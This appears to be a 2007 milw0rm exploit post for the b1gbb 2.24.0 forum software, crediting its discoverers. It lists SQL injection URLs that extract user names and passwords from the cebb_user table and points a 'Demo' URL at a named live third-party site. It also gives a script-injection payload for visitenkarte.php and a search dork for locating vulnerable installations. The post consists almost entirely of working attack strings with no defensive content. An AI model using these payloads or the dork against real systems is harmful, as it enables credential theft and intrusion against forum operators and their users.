32 lines
No EOL
906 B
Text
32 lines
No EOL
906 B
Text
# b1gbb 2.24.0 (SQL/XSS) Remote Vulnerabilities
|
|
|
|
# D.Script :
|
|
http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip
|
|
|
|
# Exploits SQL :
|
|
|
|
//showthread.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
|
|
OR
|
|
|
|
/showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
|
|
Demo
|
|
|
|
http://www.gkovacs.de/forum/showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
|
|
|
|
# Exploit XSS :
|
|
/visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
|
|
|
|
# Dork:
|
|
"powered by b1gBB (b1g Bulletion Board)"
|
|
|
|
|
|
# Discovered by:
|
|
GoLd_M = [Mahmood_ali] & t0pP8uZz
|
|
|
|
# Homepage:
|
|
http://www.Tryag.Com/cc
|
|
|
|
# Sp.Thanx To :
|
|
Tryag-Team & G0t-Root.Net
|
|
|
|
# milw0rm.com [2007-06-28] |